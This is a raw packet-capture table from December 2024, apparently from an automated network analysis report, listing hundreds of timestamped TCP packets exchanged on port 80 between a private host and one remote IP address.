                                                                                                                                                                                                Dec 13, 2024 08:18:51.298738003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.299704075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.299808979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.299921036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.300913095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.301016092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.301115036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.302164078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.302239895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.302336931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.303301096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.303394079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.303493977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.304500103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.304650068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.304755926 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.305680990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.305788994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.305907011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.306864023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.306915045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.307023048 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.308101892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.308218002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.308314085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.309345961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.309357882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.309508085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.310491085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.310566902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.310638905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.311655998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.311765909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.311819077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.312886000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.312993050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.313118935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.314063072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.314138889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.314254999 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.315234900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.315347910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.315444946 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.316425085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.316534042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.316790104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.317606926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.317749977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.317882061 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.318820000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.318994999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.319103956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.320002079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.320106030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.320200920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.321156025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.371256113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.450798988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.450850964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.450943947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.451242924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.451302052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.451394081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.452425957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.452521086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.452614069 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.453646898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.453764915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.453870058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.454804897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.454961061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.455054998 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.456032991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.456186056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.456276894 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.457230091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.457427979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.457525969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.458415031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.458482027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.458600044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.459583998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.459677935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.459774971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.460789919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.460963964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.461056948 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.461975098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.462101936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.462189913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.463171959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.463239908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.463330030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.464356899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.464513063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.464610100 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.465567112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.465665102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.465758085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.466749907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.466850996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.466896057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.467967987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.468092918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.468180895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.469136000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.469336987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.469424009 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.470323086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.470419884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.470510960 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.471543074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.471625090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.471718073 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.472717047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.472815990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.472904921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.473920107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.474008083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.474092007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.475123882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.475244045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.475342035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.476305962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.476334095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.476428986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.477580070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.477731943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.477844954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.478694916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.478801966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.478905916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.479872942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.479994059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.480099916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.481081963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.481173038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.481266975 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.482281923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.482391119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.482492924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.483484983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.483567953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.483655930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.484654903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.484761000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.484864950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.485877037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.485972881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.486061096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.487045050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.487088919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.487179995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.488255978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.488373041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.488465071 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.489423990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.489541054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.489628077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.490607023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.490722895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.490812063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.491813898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.491926908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.492041111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.493026972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.493149996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.493252039 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.494286060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.494321108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.494443893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.495615005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.495740891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.495841026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.496758938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.496845007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.496947050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.498176098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.498317957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.498364925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.499209881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.499244928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.499329090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.500195980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.500274897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.500380993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.501349926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.501456976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.501548052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.502572060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.502753973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.502844095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.503778934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.503922939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.504021883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.504959106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.505063057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.505170107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.506159067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.506254911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.506344080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.507374048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.507479906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.507589102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.509088039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.509291887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.509380102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.510077000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.510113955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.510201931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.510909081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.511015892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.511121035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.512115002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.512240887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.512322903 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.513278961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.558739901 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.645119905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.645165920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.645276070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.645692110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.645749092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.645843029 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.646888018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.646975994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.647075891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.648076057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.648433924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.648500919 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.648561001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.649650097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.649719954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.649750948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.650840044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.650906086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.650943995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.652031898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.652097940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.652121067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.653254032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.653320074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.653346062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.654544115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.654598951 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.654639006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.655616045 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.655677080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.655694008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.656796932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.656894922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.657299042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.658015013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.658128977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.658135891 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.659245014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.659323931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.659348965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.660394907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.660470009 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.660531998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.661673069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.661748886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.661931038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.662846088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.662935972 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.662951946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.663975000 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.664042950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.664073944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.665164948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.665245056 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.665266991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.666361094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.666426897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.666450024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.667556047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.667596102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.667628050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.668742895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.668829918 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.668838978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.669929028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.670011997 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.670027018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.671144962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.671201944 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.671255112 CET8049726185.81.68.147192.168.2.11
